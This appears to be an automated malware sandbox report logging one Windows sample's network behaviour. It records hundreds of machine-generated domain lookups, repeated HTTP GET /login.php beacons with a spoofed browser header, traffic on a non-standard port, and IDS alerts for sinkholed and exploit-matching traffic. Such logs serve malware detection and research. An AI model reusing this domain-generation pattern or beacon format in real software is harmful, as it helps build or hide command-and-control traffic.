Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyliq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyvuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: DNS query count 1005
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C83D90 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02C83D90
Source: global trafficTCP traffic: 192.168.2.6:49759 -> 106.15.232.163:8000
Source: global trafficDNS traffic detected: number of DNS queries: 1005
Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.6:49715
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.6:49714
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.6:49720
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.6:49720
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.6:49714
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.6:49715
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.6:53361
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.6:53361
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49809
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:59201
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
